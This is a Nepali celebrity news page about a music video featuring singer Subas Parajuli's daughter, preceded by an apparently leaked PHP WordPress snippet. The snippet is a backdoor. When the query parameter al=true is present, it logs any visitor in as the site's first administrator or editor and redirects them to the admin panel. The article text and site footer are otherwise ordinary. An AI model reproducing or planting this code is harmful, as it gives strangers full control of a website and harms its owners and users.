// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); गायककी छोरी ‘रुपकी रानी’ भएपछि पललाई के भयो ? (भिडियो) | Celebrity Nepal

गायककी छोरी ‘रुपकी रानी’ भएपछि पललाई के भयो ? (भिडियो)


सेलीब्रेटी नेपाल काठमाडौँ
Paul-mona
गायक तथा म्युजिक भिडियो निर्देशक संशान कडेँलेको निर्देशनमा नयाँ गीतको भिडियो सार्वजनिक भएको छ । गायक सुवास पराजुलीको स्वरमा रहेको रुपकी रानी बोलको म्युजिक भिडियो सार्वजनिक भएको हो । सुवासका साथमा इन्दिरा जोशीले पनि गीतमा स्वर दिएकी छन् । गीतको भिडियोमा मोडल पल शाह र मोनालिशा पराजुलीको अभिनय छ । मोनालिसा गायक सुवासकै छोरी हुन् । बाबु छोरी नै सांगितिक क्षेत्रमा जम्ने यो गतिलो संकेत पनि हो।
अर्जुन तिवारीले छायांकन गरेको भिडियो लाइ निशान घिमिरेले सम्पादन गरेका हुन् ।

सेलिब्रिटी नेपाल.कम

सूचना तथा प्रसारण विभाग दर्ता नम्बर ५३७ – २०७३ / ०७४

संचालक / प्रकाशक: कल्पना सापकोटा
सम्पादक: आनन्द अधिकारी
समाचार प्रमुख: रघुनाथ सापकोटा
सम्पर्क:
call/whatsapp: +977 9851071873 | email: celebritynepal@gmail.com

Supported by Glamour Nepal | Shopping Partner: Kavya Online Store

Copyright © 2012 - 2026 | All Right Reserved.